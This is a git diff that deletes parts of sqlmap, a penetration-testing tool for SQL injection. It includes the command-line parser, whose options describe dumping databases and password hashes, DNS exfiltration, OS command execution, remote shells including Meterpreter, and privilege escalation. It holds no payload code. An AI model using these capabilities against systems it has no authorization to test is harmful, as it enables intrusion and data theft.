self.__doc = Document() - - self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING) - - if self.__root is None: - self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME) - self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR)) - self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME)) - self.__doc.appendChild(self.__root) - except IOError: - raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile) - - def getOutputFile(self): - return self._outputFile - - def finish(self, resultStatus, resultMsg=""): - ''' - Finishes the dumper operation: - 1. Adds the session status to the xml - 2. Writes the xml to the file - 3. Closes the xml file - ''' - if ((self._outputFP is not None) and not(self._outputFP.closed)): - statusElem = self.__doc.createElement(STATUS_ELEM_NAME) - statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus))) - - if not resultStatus: - errorElem = self.__doc.createElement(ERROR_ELEM_NAME) - - if isinstance(resultMsg, Exception): - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__)) - else: - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE)) - - errorElem.appendChild(self._createTextNode(getUnicode(resultMsg))) - statusElem.appendChild(errorElem) - - self._addToRoot(statusElem) - self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING)) - self._outputFP.close() - - -def closeDumper(status, msg=""): - """ - Closes the dumper of the session - """ - - if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"): - conf.dumper.finish(status, msg) - -dumper = XMLDump() diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/parse/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/parse/banner.py b/lib/parse/banner.py deleted file mode 100644 index 422378e0..00000000 --- a/lib/parse/banner.py +++ /dev/null @@ -1,115 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from xml.sax.handler import ContentHandler - -from lib.core.common import Backend -from lib.core.common import parseXmlFile -from lib.core.common import sanitizeStr -from lib.core.data import kb -from lib.core.data import paths -from lib.core.enums import DBMS -from lib.parse.handler import FingerprintHandler - -class MSSQLBannerHandler(ContentHandler): - """ - This class defines methods to parse and extract information from the - given Microsoft SQL Server banner based upon the data in XML file - """ - - def __init__(self, banner, info): - ContentHandler.__init__(self) - - self._banner = sanitizeStr(banner) - self._inVersion = False - self._inServicePack = False - self._release = None - self._version = "" - self._versionAlt = None - self._servicePack = "" - self._info = info - - def _feedInfo(self, key, value): - value = sanitizeStr(value) - - if value in (None, "None"): - return - - self._info[key] = value - - def startElement(self, name, attrs): - if name == "signatures": - self._release = sanitizeStr(attrs.get("release")) - - elif name == "version": - self._inVersion = True - - elif name == "servicepack": - self._inServicePack = True - - def characters(self, data): - if self._inVersion: - self._version += sanitizeStr(data) - elif self._inServicePack: - self._servicePack += sanitizeStr(data) - - def endElement(self, name): - if name == "signature": - for version in (self._version, self._versionAlt): - if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner): - self._feedInfo("dbmsRelease", self._release) - self._feedInfo("dbmsVersion", self._version) - self._feedInfo("dbmsServicePack", self._servicePack) - break - - self._version = "" - self._versionAlt = None - self._servicePack = "" - - elif name == "version": - self._inVersion = False - self._version = self._version.replace(" ", "") - - match = re.search(r"\A(?P\d+)\.00\.(?P\d+)\Z", self._version) - self._versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None - - elif name == "servicepack": - self._inServicePack = False - self._servicePack = self._servicePack.replace(" ", "") - -def bannerParser(banner): - """ - This function calls a class to extract information from the given - DBMS banner based upon the data in XML file - """ - - xmlfile = None - - if Backend.isDbms(DBMS.MSSQL): - xmlfile = paths.MSSQL_XML - elif Backend.isDbms(DBMS.MYSQL): - xmlfile = paths.MYSQL_XML - elif Backend.isDbms(DBMS.ORACLE): - xmlfile = paths.ORACLE_XML - elif Backend.isDbms(DBMS.PGSQL): - xmlfile = paths.PGSQL_XML - - if not xmlfile: - return - - if Backend.isDbms(DBMS.MSSQL): - handler = MSSQLBannerHandler(banner, kb.bannerFp) - parseXmlFile(xmlfile, handler) - - handler = FingerprintHandler(banner, kb.bannerFp) - parseXmlFile(paths.GENERIC_XML, handler) - else: - handler = FingerprintHandler(banner, kb.bannerFp) - parseXmlFile(xmlfile, handler) - parseXmlFile(paths.GENERIC_XML, handler) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py deleted file mode 100644 index 363fb517..00000000 --- a/lib/parse/cmdline.py +++ /dev/null @@ -1,954 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import shlex -import sys - -from optparse import OptionError -from optparse import OptionGroup -from optparse import OptionParser -from optparse import SUPPRESS_HELP - -from lib.core.common import checkDeprecatedOptions -from lib.core.common import checkSystemEncoding -from lib.core.common import expandMnemonics -from lib.core.common import getUnicode -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import logger -from lib.core.defaults import defaults -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.exception import SqlmapShellQuitException -from lib.core.exception import SqlmapSyntaxException -from lib.core.settings import BASIC_HELP_ITEMS -from lib.core.settings import DUMMY_URL -from lib.core.settings import IS_WIN -from lib.core.settings import MAX_HELP_OPTION_LENGTH -from lib.core.settings import VERSION_STRING -from lib.core.shell import autoCompletion -from lib.core.shell import clearHistory -from lib.core.shell import loadHistory -from lib.core.shell import saveHistory - -def cmdLineParser(argv=None): - """ - This function parses the command line parameters and arguments - """ - - if not argv: - argv = sys.argv - - checkSystemEncoding() - - _ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding()) - - usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ - "\"%s\"" % _ if " " in _ else _) - - parser = OptionParser(usage=usage) - - try: - parser.add_option("--hh", dest="advancedHelp", - action="store_true", - help="Show advanced help message and exit") - - parser.add_option("--version", dest="showVersion", - action="store_true", - help="Show program's version number and exit") - - parser.add_option("-v", dest="verbose", type="int", - help="Verbosity level: 0-6 (default %d)" % defaults.verbose) - - # Target options - target = OptionGroup(parser, "Target", "At least one of these " - "options has to be provided to define the target(s)") - - target.add_option("-d", dest="direct", help="Connection string " - "for direct database connection") - - target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")") - - target.add_option("-l", dest="logFile", help="Parse target(s) from Burp " - "or WebScarab proxy log file") - - target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file") - - target.add_option("-m", dest="bulkFile", help="Scan multiple targets given " - "in a textual file ") - - target.add_option("-r", dest="requestFile", - help="Load HTTP request from a file") - - target.add_option("-g", dest="googleDork", - help="Process Google dork results as target URLs") - - target.add_option("-c", dest="configFile", - help="Load options from a configuration INI file") - - # Request options - request = OptionGroup(parser, "Request", "These options can be used " - "to specify how to connect to the target URL") - - request.add_option("--method", dest="method", - help="Force usage of given HTTP method (e.g. PUT)") - - request.add_option("--data", dest="data", - help="Data string to be sent through POST") - - request.add_option("--param-del", dest="paramDel", - help="Character used for splitting parameter values") - - request.add_option("--cookie", dest="cookie", - help="HTTP Cookie header value") - - request.add_option("--cookie-del", dest="cookieDel", - help="Character used for splitting cookie values") - - request.add_option("--load-cookies", dest="loadCookies", - help="File containing cookies in Netscape/wget format") - - request.add_option("--drop-set-cookie", dest="dropSetCookie", - action="store_true", - help="Ignore Set-Cookie header from response") - - request.add_option("--user-agent", dest="agent", - help="HTTP User-Agent header value") - - request.add_option("--random-agent", dest="randomAgent", - action="store_true", - help="Use randomly selected HTTP User-Agent header value") - - request.add_option("--host", dest="host", - help="HTTP Host header value") - - request.add_option("--referer", dest="referer", - help="HTTP Referer header value") - - request.add_option("-H", "--header", dest="header", - help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")") - - request.add_option("--headers", dest="headers", - help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") - - request.add_option("--auth-type", dest="authType", - help="HTTP authentication type " - "(Basic, Digest, NTLM or PKI)") - - request.add_option("--auth-cred", dest="authCred", - help="HTTP authentication credentials " - "(name:password)") - - request.add_option("--auth-file", dest="authFile", - help="HTTP authentication PEM cert/private key file") - - request.add_option("--ignore-401", dest="ignore401", action="store_true", - help="Ignore HTTP Error 401 (Unauthorized)") - - request.add_option("--proxy", dest="proxy", - help="Use a proxy to connect to the target URL") - - request.add_option("--proxy-cred", dest="proxyCred", - help="Proxy authentication credentials " - "(name:password)") - - request.add_option("--proxy-file", dest="proxyFile", - help="Load proxy list from a file") - - request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", - help="Ignore system default proxy settings") - - request.add_option("--tor", dest="tor", - action="store_true", - help="Use Tor anonymity network") - - request.add_option("--tor-port", dest="torPort", - help="Set Tor proxy port other than default") - - request.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)") - - request.add_option("--check-tor", dest="checkTor", - action="store_true", - help="Check to see if Tor is used properly") - - request.add_option("--delay", dest="delay", type="float", - help="Delay in seconds between each HTTP request") - - request.add_option("--timeout", dest="timeout", type="float", - help="Seconds to wait before timeout connection " - "(default %d)" % defaults.timeout) - - request.add_option("--retries", dest="retries", type="int", - help="Retries when the connection timeouts " - "(default %d)" % defaults.retries) - - request.add_option("--randomize", dest="rParam", - help="Randomly change value for given parameter(s)") - - request.add_option("--safe-url", dest="safeUrl", - help="URL address to visit frequently during testing") - - request.add_option("--safe-post", dest="safePost", - help="POST data to send to a safe URL") - - request.add_option("--safe-req", dest="safeReqFile", - help="Load safe HTTP request from a file") - - request.add_option("--safe-freq", dest="safeFreq", type="int", - help="Test requests between two visits to a given safe URL") - - request.add_option("--skip-urlencode", dest="skipUrlEncode", - action="store_true", - help="Skip URL encoding of payload data") - - request.add_option("--csrf-token", dest="csrfToken", - help="Parameter used to hold anti-CSRF token") - - request.add_option("--csrf-url", dest="csrfUrl", - help="URL address to visit to extract anti-CSRF token") - - request.add_option("--force-ssl", dest="forceSSL", - action="store_true", - help="Force usage of SSL/HTTPS") - - request.add_option("--hpp", dest="hpp", - action="store_true", - help="Use HTTP parameter pollution method") - - request.add_option("--eval", dest="evalCode", - help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") - - # Optimization options - optimization = OptionGroup(parser, "Optimization", "These " - "options can be used to optimize the " - "performance of sqlmap") - - optimization.add_option("-o", dest="optimize", - action="store_true", - help="Turn on all optimization switches") - - optimization.add_option("--predict-output", dest="predictOutput", action="store_true", - help="Predict common queries output") - - optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", - help="Use persistent HTTP(s) connections") - - optimization.add_option("--null-connection", dest="nullConnection", action="store_true", - help="Retrieve page length without actual HTTP response body") - - optimization.add_option("--threads", dest="threads", type="int", - help="Max number of concurrent HTTP(s) " - "requests (default %d)" % defaults.threads) - - # Injection options - injection = OptionGroup(parser, "Injection", "These options can be " - "used to specify which parameters to test " - "for, provide custom injection payloads and " - "optional tampering scripts") - - injection.add_option("-p", dest="testParameter", - help="Testable parameter(s)") - - injection.add_option("--skip", dest="skip", - help="Skip testing for given parameter(s)") - - injection.add_option("--skip-static", dest="skipStatic", action="store_true", - help="Skip testing parameters that not appear dynamic") - - injection.add_option("--dbms", dest="dbms", - help="Force back-end DBMS to this value") - - injection.add_option("--dbms-cred", dest="dbmsCred", - help="DBMS authentication credentials (user:password)") - - injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system " - "to this value") - - injection.add_option("--invalid-bignum", dest="invalidBignum", - action="store_true", - help="Use big numbers for invalidating values") - - injection.add_option("--invalid-logical", dest="invalidLogical", - action="store_true", - help="Use logical operations for invalidating values") - - injection.add_option("--invalid-string", dest="invalidString", - action="store_true", - help="Use random strings for invalidating values") - - injection.add_option("--no-cast", dest="noCast", - action="store_true", - help="Turn off payload casting mechanism") - - injection.add_option("--no-escape", dest="noEscape", - action="store_true", - help="Turn off string escaping mechanism") - - injection.add_option("--prefix", dest="prefix", - help="Injection payload prefix string") - - injection.add_option("--suffix", dest="suffix", - help="Injection payload suffix string") - - injection.add_option("--tamper", dest="tamper", - help="Use given script(s) for tampering injection data") - - # Detection options - detection = OptionGroup(parser, "Detection", "These options can be " - "used to customize the detection phase") - - detection.add_option("--level", dest="level", type="int", - help="Level of tests to perform (1-5, " - "default %d)" % defaults.level) - - detection.add_option("--risk", dest="risk", type="int", - help="Risk of tests to perform (1-3, " - "default %d)" % defaults.level) - - detection.add_option("--string", dest="string", - help="String to match when " - "query is evaluated to True") - - detection.add_option("--not-string", dest="notString", - help="String to match when " - "query is evaluated to False") - - detection.add_option("--regexp", dest="regexp", - help="Regexp to match when " - "query is evaluated to True") - - detection.add_option("--code", dest="code", type="int", - help="HTTP code to match when " - "query is evaluated to True") - - detection.add_option("--text-only", dest="textOnly", - action="store_true", - help="Compare pages based only on the textual content") - - detection.add_option("--titles", dest="titles", - action="store_true", - help="Compare pages based only on their titles") - - # Techniques options - techniques = OptionGroup(parser, "Techniques", "These options can be " - "used to tweak testing of specific SQL " - "injection techniques") - - techniques.add_option("--technique", dest="tech", - help="SQL injection techniques to use " - "(default \"%s\")" % defaults.tech) - - techniques.add_option("--time-sec", dest="timeSec", - type="int", - help="Seconds to delay the DBMS response " - "(default %d)" % defaults.timeSec) - - techniques.add_option("--union-cols", dest="uCols", - help="Range of columns to test for UNION query SQL injection") - - techniques.add_option("--union-char", dest="uChar", - help="Character to use for bruteforcing number of columns") - - techniques.add_option("--union-from", dest="uFrom", - help="Table to use in FROM part of UNION query SQL injection") - - techniques.add_option("--dns-domain", dest="dnsName", - help="Domain name used for DNS exfiltration attack") - - techniques.add_option("--second-order", dest="secondOrder", - help="Resulting page URL searched for second-order " - "response") - - # Fingerprint options - fingerprint = OptionGroup(parser, "Fingerprint") - - fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", - action="store_true", - help="Perform an extensive DBMS version fingerprint") - - # Enumeration options - enumeration = OptionGroup(parser, "Enumeration", "These options can " - "be used to enumerate the back-end database " - "management system information, structure " - "and data contained in the tables. Moreover " - "you can run your own SQL statements") - - enumeration.add_option("-a", "--all", dest="getAll", - action="store_true", help="Retrieve everything") - - enumeration.add_option("-b", "--banner", dest="getBanner", - action="store_true", help="Retrieve DBMS banner") - - enumeration.add_option("--current-user", dest="getCurrentUser", - action="store_true", - help="Retrieve DBMS current user") - - enumeration.add_option("--current-db", dest="getCurrentDb", - action="store_true", - help="Retrieve DBMS current database") - - enumeration.add_option("--hostname", dest="getHostname", - action="store_true", - help="Retrieve DBMS server hostname") - - enumeration.add_option("--is-dba", dest="isDba", - action="store_true", - help="Detect if the DBMS current user is DBA") - - enumeration.add_option("--users", dest="getUsers", action="store_true", - help="Enumerate DBMS users") - - enumeration.add_option("--passwords", dest="getPasswordHashes", - action="store_true", - help="Enumerate DBMS users password hashes") - - enumeration.add_option("--privileges", dest="getPrivileges", - action="store_true", - help="Enumerate DBMS users privileges") - - enumeration.add_option("--roles", dest="getRoles", - action="store_true", - help="Enumerate DBMS users roles") - - enumeration.add_option("--dbs", dest="getDbs", action="store_true", - help="Enumerate DBMS databases") - - enumeration.add_option("--tables", dest="getTables", action="store_true", - help="Enumerate DBMS database tables") - - enumeration.add_option("--columns", dest="getColumns", action="store_true", - help="Enumerate DBMS database table columns") - - enumeration.add_option("--schema", dest="getSchema", action="store_true", - help="Enumerate DBMS schema") - - enumeration.add_option("--count", dest="getCount", action="store_true", - help="Retrieve number of entries for table(s)") - - enumeration.add_option("--dump", dest="dumpTable", action="store_true", - help="Dump DBMS database table entries") - - enumeration.add_option("--dump-all", dest="dumpAll", action="store_true", - help="Dump all DBMS databases tables entries") - - enumeration.add_option("--search", dest="search", action="store_true", - help="Search column(s), table(s) and/or database name(s)") - - enumeration.add_option("--comments", dest="getComments", action="store_true", - help="Retrieve DBMS comments") - - enumeration.add_option("-D", dest="db", - help="DBMS database to enumerate") - - enumeration.add_option("-T", dest="tbl", - help="DBMS database table(s) to enumerate") - - enumeration.add_option("-C", dest="col", - help="DBMS database table column(s) to enumerate") - - enumeration.add_option("-X", dest="excludeCol", - help="DBMS database table column(s) to not enumerate") - - enumeration.add_option("-U", dest="user", - help="DBMS user to enumerate") - - enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", - action="store_true", - help="Exclude DBMS system databases when " - "enumerating tables") - - enumeration.add_option("--where", dest="dumpWhere", - help="Use WHERE condition while table dumping") - - enumeration.add_option("--start", dest="limitStart", type="int", - help="First query output entry to retrieve") - - enumeration.add_option("--stop", dest="limitStop", type="int", - help="Last query output entry to retrieve") - - enumeration.add_option("--first", dest="firstChar", type="int", - help="First query output word character to retrieve") - - enumeration.add_option("--last", dest="lastChar", type="int", - help="Last query output word character to retrieve") - - enumeration.add_option("--sql-query", dest="query", - help="SQL statement to be executed") - - enumeration.add_option("--sql-shell", dest="sqlShell", - action="store_true", - help="Prompt for an interactive SQL shell") - - enumeration.add_option("--sql-file", dest="sqlFile", - help="Execute SQL statements from given file(s)") - - # Brute force options - brute = OptionGroup(parser, "Brute force", "These " - "options can be used to run brute force " - "checks") - - brute.add_option("--common-tables", dest="commonTables", action="store_true", - help="Check existence of common tables") - - brute.add_option("--common-columns", dest="commonColumns", action="store_true", - help="Check existence of common columns") - - # User-defined function options - udf = OptionGroup(parser, "User-defined function injection", "These " - "options can be used to create custom user-defined " - "functions") - - udf.add_option("--udf-inject", dest="udfInject", action="store_true", - help="Inject custom user-defined functions") - - udf.add_option("--shared-lib", dest="shLib", - help="Local path of the shared library") - - # File system options - filesystem = OptionGroup(parser, "File system access", "These options " - "can be used to access the back-end database " - "management system underlying file system") - - filesystem.add_option("--file-read", dest="rFile", - help="Read a file from the back-end DBMS " - "file system") - - filesystem.add_option("--file-write", dest="wFile", - help="Write a local file on the back-end " - "DBMS file system") - - filesystem.add_option("--file-dest", dest="dFile", - help="Back-end DBMS absolute filepath to " - "write to") - - # Takeover options - takeover = OptionGroup(parser, "Operating system access", "These " - "options can be used to access the back-end " - "database management system underlying " - "operating system") - - takeover.add_option("--os-cmd", dest="osCmd", - help="Execute an operating system command") - - takeover.add_option("--os-shell", dest="osShell", - action="store_true", - help="Prompt for an interactive operating " - "system shell") - - takeover.add_option("--os-pwn", dest="osPwn", - action="store_true", - help="Prompt for an OOB shell, " - "Meterpreter or VNC") - - takeover.add_option("--os-smbrelay", dest="osSmb", - action="store_true", - help="One click prompt for an OOB shell, " - "Meterpreter or VNC") - - takeover.add_option("--os-bof", dest="osBof", - action="store_true", - help="Stored procedure buffer overflow " - "exploitation") - - takeover.add_option("--priv-esc", dest="privEsc", - action="store_true", - help="Database process user privilege escalation") - - takeover.add_option("--msf-path", dest="msfPath", - help="Local path where Metasploit Framework " - "is installed") - - takeover.add_option("--tmp-path", dest="tmpPath", - help="Remote absolute path of temporary files " - "directory") - - # Windows registry options - windows = OptionGroup(parser, "Windows registry access", "These " - "options can be used to access the back-end " - "database management system Windows " - "registry") - - windows.add_option("--reg-read", dest="regRead", - action="store_true", - help="Read a Windows registry key value") - - windows.add_option("--reg-add", dest="regAdd", - action="store_true", - help="Write a Windows registry key value data") - - windows.add_option("--reg-del", dest="regDel", - action="store_true", - help="Delete a Windows registry key value") - - windows.add_option("--reg-key", dest="regKey", - help="Windows registry key") - - windows.add_option("--reg-value", dest="regVal", - help="Windows registry key value") - - windows.add_option("--reg-data", dest="regData", - help="Windows registry key value data") - - windows.add_option("--reg-type", dest="regType", - help="Windows registry key value type") - - # General options - general = OptionGroup(parser, "General", "These options can be used " - "to set some general working parameters") - - #general.add_option("-x", dest="xmlFile", - # help="Dump the data into an XML file") - - general.add_option("-s", dest="sessionFile", - help="Load session from a stored (.sqlite) file") - - general.add_option("-t", dest="trafficFile", - help="Log all HTTP traffic into a " - "textual file") - - general.add_option("--batch", dest="batch", - action="store_true", - help="Never ask for user input, use the default behaviour") - - general.add_option("--charset", dest="charset", - help="Force character encoding used for data retrieval") - - general.add_option("--crawl", dest="crawlDepth", type="int", - help="Crawl the website starting from the target URL") - - general.add_option("--crawl-exclude", dest="crawlExclude", - help="Regexp to exclude pages from crawling (e.g. \"logout\")") - - general.add_option("--csv-del", dest="csvDel", - help="Delimiting character used in CSV output " - "(default \"%s\")" % defaults.csvDel) - - general.add_option("--dump-format", dest="dumpFormat", - help="Format of dumped data (CSV (default), HTML or SQLITE)") - - general.add_option("--eta", dest="eta", - action="store_true", - help="Display for each output the " - "estimated time of arrival") - - general.add_option("--flush-session", dest="flushSession", - action="store_true", - help="Flush session files for current target") - - general.add_option("--forms", dest="forms", - action="store_true", - help="Parse and test forms on target URL") - - general.add_option("--fresh-queries", dest="freshQueries", - action="store_true", - help="Ignore query results stored in session file") - - general.add_option("--hex", dest="hexConvert", - action="store_true", - help="Use DBMS hex function(s) for data retrieval") - - general.add_option("--output-dir", dest="outputDir", - action="store", - help="Custom output directory path") - - general.add_option("--parse-errors", dest="parseErrors", - action="store_true", - help="Parse and display DBMS error messages from responses") - - general.add_option("--pivot-column", dest="pivotColumn", - help="Pivot column name") - - general.add_option("--save", dest="saveConfig", - help="Save options to a configuration INI file") - - general.add_option("--scope", dest="scope", - help="Regexp to filter targets from provided proxy log") - - general.add_option("--test-filter", dest="testFilter", - help="Select tests by payloads and/or titles (e.g. ROW)") - - general.add_option("--test-skip", dest="testSkip", - help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") - - general.add_option("--update", dest="updateAll", - action="store_true", - help="Update sqlmap") - - # Miscellaneous options - miscellaneous = OptionGroup(parser, "Miscellaneous") - - miscellaneous.add_option("-z", dest="mnemonics", - help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") - - miscellaneous.add_option("--alert", dest="alert", - help="Run host OS command(s) when SQL injection is found") - - miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. \"quit=N,follow=N\")") - - miscellaneous.add_option("--beep", dest="beep", action="store_true", - help="Beep on question and/or when SQL injection is found") - - miscellaneous.add_option("--cleanup", dest="cleanup", - action="store_true", - help="Clean up the DBMS from sqlmap specific " - "UDF and tables") - - miscellaneous.add_option("--dependencies", dest="dependencies", - action="store_true", - help="Check for missing (non-core) sqlmap dependencies") - - miscellaneous.add_option("--disable-coloring", dest="disableColoring", - action="store_true", - help="Disable console output coloring") - - miscellaneous.add_option("--gpage", dest="googlePage", type="int", - help="Use Google dork results from specified page number") - - miscellaneous.add_option("--identify-waf", dest="identifyWaf", - action="store_true", - help="Make a thorough testing for a WAF/IPS/IDS protection") - - miscellaneous.add_option("--skip-waf", dest="skipWaf", - action="store_true", - help="Skip heuristic detection of WAF/IPS/IDS protection") - - miscellaneous.add_option("--mobile", dest="mobile", - action="store_true", - help="Imitate smartphone through HTTP User-Agent header") - - miscellaneous.add_option("--offline", dest="offline", - action="store_true", - help="Work in offline mode (only use session data)") - - miscellaneous.add_option("--page-rank", dest="pageRank", - action="store_true", - help="Display page rank (PR) for Google dork results") - - miscellaneous.add_option("--purge-output", dest="purgeOutput", - action="store_true", - help="Safely remove all content from output directory") - - miscellaneous.add_option("--smart", dest="smart", - action="store_true", - help="Conduct thorough tests only if positive heuristic(s)") - - miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", - help="Prompt for an interactive sqlmap shell") - - miscellaneous.add_option("--wizard", dest="wizard", - action="store_true", - help="Simple wizard interface for beginner users") - - # Hidden and/or experimental options - parser.add_option("--dummy", dest="dummy", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--pickled-options", dest="pickledOptions", - help=SUPPRESS_HELP) - - parser.add_option("--disable-precon", dest="disablePrecon", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--profile", dest="profile", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--binary-fields", dest="binaryFields", - help=SUPPRESS_HELP) - - parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", - help=SUPPRESS_HELP) - - parser.add_option("--force-dns", dest="forceDns", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--force-threads", dest="forceThreads", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--smoke-test", dest="smokeTest", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--live-test", dest="liveTest", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--stop-fail", dest="stopFail", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) - - parser.add_option_group(target) - parser.add_option_group(request) - parser.add_option_group(optimization) - parser.add_option_group(injection) - parser.add_option_group(detection) - parser.add_option_group(techniques) - parser.add_option_group(fingerprint) - parser.add_option_group(enumeration) - parser.add_option_group(brute) - parser.add_option_group(udf) - parser.add_option_group(filesystem) - parser.add_option_group(takeover) - parser.add_option_group(windows) - parser.add_option_group(general) - parser.add_option_group(miscellaneous) - - # Dirty hack to display longer options without breaking into two lines - def _(self, *args): - retVal = parser.formatter._format_option_strings(*args) - if len(retVal) > MAX_HELP_OPTION_LENGTH: - retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal - return retVal - - parser.formatter._format_option_strings = parser.formatter.format_option_strings - parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser)) - - # Dirty hack for making a short option -hh - option = parser.get_option("--hh") - option._short_opts = ["-hh"] - option._long_opts = [] - - # Dirty hack for inherent help message of switch -h - option = parser.get_option("-h") - option.help = option.help.capitalize().replace("this help", "basic help") - - _ = [] - prompt = False - advancedHelp = True - extraHeaders = [] - - for arg in argv: - _.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) - - argv = _ - checkDeprecatedOptions(argv) - - prompt = "--sqlmap-shell" in argv - - if prompt: - parser.usage = "" - cmdLineOptions.sqlmapShell = True - - _ = ["x", "q", "exit", "quit", "clear"] - - for option in parser.option_list: - _.extend(option._long_opts) - _.extend(option._short_opts) - - for group in parser.option_groups: - for option in group.option_list: - _.extend(option._long_opts) - _.extend(option._short_opts) - - autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_) - - while True: - command = None - - try: - command = raw_input("sqlmap-shell> ").strip() - command = getUnicode(command, encoding=sys.stdin.encoding) - except (KeyboardInterrupt, EOFError): - print - raise SqlmapShellQuitException - - if not command: - continue - elif command.lower() == "clear": - clearHistory() - print "[i] history cleared" - saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) - elif command.lower() in ("x", "q", "exit", "quit"): - raise SqlmapShellQuitException - elif command[0] != '-': - print "[!] invalid option(s) provided" - print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'" - else: - saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) - loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) - break - - try: - for arg in shlex.split(command): - argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) - except ValueError, ex: - raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message - - # Hide non-basic options in basic help case - for i in xrange(len(argv)): - if argv[i] == "-hh": - argv[i] = "-h" - elif re.search(r"\A-\w=.+", argv[i]): - print "[!] potentially miswritten (illegal '=') short option detected ('%s')" % argv[i] - elif argv[i] == "-H": - if i + 1 < len(argv): - extraHeaders.append(argv[i + 1]) - elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]): - argv[i] = argv[i][:-1] - conf.skipThreadCheck = True - elif argv[i] == "--version": - print VERSION_STRING.split('/')[-1] - raise SystemExit - elif argv[i] == "-h": - advancedHelp = False - for group in parser.option_groups[:]: - found = False - for option in group.option_list: - if option.dest not in BASIC_HELP_ITEMS: - option.help = SUPPRESS_HELP - else: - found = True - if not found: - parser.option_groups.remove(group) - - try: - (args, _) = parser.parse_args(argv) - except UnicodeEncodeError, ex: - print "\n[!] %s" % ex.object.encode("unicode-escape") - raise SystemExit - except SystemExit: - if "-h" in argv and not advancedHelp: - print "\n[!] to see full list of options run with '-hh'" - raise - - if extraHeaders: - if not args.headers: - args.headers = "" - delimiter = "\\n" if "\\n" in args.headers else "\n" - args.headers += delimiter + delimiter.join(extraHeaders) - - # Expand given mnemonic options (e.g. -z "ign,flu,bat") - for i in xrange(len(argv) - 1): - if argv[i] == "-z": - expandMnemonics(argv[i + 1], parser, args) - - if args.dummy: - args.url = args.url or DUMMY_URL - - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ - args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.pickledOptions, args.sitemapUrl)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help" - parser.error(errMsg) - - return args - - except (OptionError, TypeError), e: - parser.error(e) - - except SystemExit: - # Protection against Windows dummy double clicking - if IS_WIN: - print "\nPress Enter to continue...", - raw_input() - raise - - debugMsg = "parsing command line" - logger.debug(debugMsg) diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py deleted file mode 100644 index ef6807b7..00000000 --- a/lib/parse/configfile.py +++ /dev/null @@ -1,98 